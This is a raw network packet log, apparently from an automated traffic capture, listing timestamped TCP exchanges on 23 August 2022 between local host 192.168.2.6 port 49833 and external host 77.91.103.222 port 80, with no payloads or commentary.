                                                                                                                                                                      Aug 23, 2022 18:26:22.971836090 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971837997 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971858978 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971860886 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971884012 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971885920 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971909046 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971909046 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971930981 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.971966982 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.971970081 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972001076 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972024918 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972028971 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972058058 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972079992 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972083092 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972101927 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972105980 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972126007 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972129107 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972150087 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972168922 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972172976 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972172976 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972197056 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972219944 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972220898 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972248077 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972249985 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972280025 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972285032 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972310066 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972313881 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972337008 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972338915 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972362041 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972383976 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972385883 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972408056 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972412109 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972435951 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972439051 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972460032 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972461939 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972465038 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972482920 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972484112 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972507000 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972507954 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972529888 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972534895 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972552061 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972558022 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972575903 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972577095 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972596884 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972620010 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972641945 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972642899 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972662926 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972665071 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972685099 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972685099 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972707033 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972707987 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972728968 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972750902 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972773075 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972795010 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972778082 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972816944 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972821951 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972839117 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972841978 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972860098 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972862959 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972882032 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972882986 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972903967 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972928047 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972949028 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972933054 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972970963 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.972970963 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.972992897 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973014116 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.973016024 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973020077 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.973037958 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973062038 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973064899 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.973083019 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973086119 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.973108053 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973129034 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973133087 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.973150969 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973170996 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.973172903 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973193884 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973196030 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.973215103 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973216057 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.973237991 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973258972 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973282099 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973284006 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.973303080 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973304033 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.973323107 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.973325014 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973346949 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973349094 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.973368883 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973371983 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.973391056 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973392963 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.973412037 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.973412991 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973433971 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973437071 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.973455906 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.973457098 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973478079 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973479033 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.973500967 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:22.973521948 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:22.973546028 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.144913912 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.145010948 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.276926041 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.277399063 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.323237896 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.323297024 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.323338985 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.323410988 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.323425055 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.323450089 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.323471069 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.323478937 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.323484898 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.323491096 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.323508978 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.323532104 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.323554039 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.323573112 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.323579073 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.323615074 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.323653936 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.323662043 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.323697090 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.323736906 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.323750973 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.323780060 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.323786974 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.323841095 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.323896885 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.323899031 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.323940992 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.323982954 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.323992014 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.324019909 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.324040890 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.324073076 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.324127913 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.324167967 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.324193954 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.324208975 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.324225903 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.324249983 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.324270010 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.324318886 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.324346066 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.324388981 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.324404955 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.324428082 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.324436903 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.324476004 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.324532986 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.324574947 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.324629068 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.324640036 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.324666977 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.324707985 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.324747086 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.324760914 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.324786901 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.324786901 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.324856997 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.324901104 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.324913979 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.324940920 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.324992895 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.325033903 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.325129032 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.325171947 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.325191975 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.325211048 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.325217009 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.325251102 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.325292110 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.325310946 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.325345993 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.325407982 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.325412989 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.325452089 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.325491905 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.325495958 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.325546980 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.325589895 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.325630903 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.325669050 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.325676918 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.325742960 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.325783014 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.325803995 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.325824022 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.325828075 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.325866938 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.325905085 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.325920105 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.325944901 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.325998068 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.326040030 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.326081038 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.326092958 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.326134920 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.326148987 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.326257944 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.326344013 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.326412916 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.326452971 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.326478004 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.326505899 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.326555014 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.326598883 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.326639891 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.326661110 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.326678038 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.326698065 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.326719046 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.326756001 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.326757908 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.326766014 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.326812029 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.326931000 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.326973915 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.326989889 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.327012062 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.327065945 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.327076912 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.327131987 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.327178955 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.327197075 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.327219009 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.327260017 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.327274084 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.327300072 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.327338934 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.327358007 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.327408075 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.327440977 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.327446938 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.327486992 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.327491045 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.327505112 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.327528954 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.327545881 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.327568054 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.327589989 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.327608109 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.327639103 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.327646971 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.327649117 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.327688932 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.327725887 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.327732086 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.327739954 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.327770948 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.327781916 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.327812910 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.327852964 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.327867985 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.327891111 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.327910900 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.327930927 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.327963114 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.327970982 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.327987909 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.328010082 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.328026056 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.328053951 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.328092098 CEST804983377.91.103.222192.168.2.6
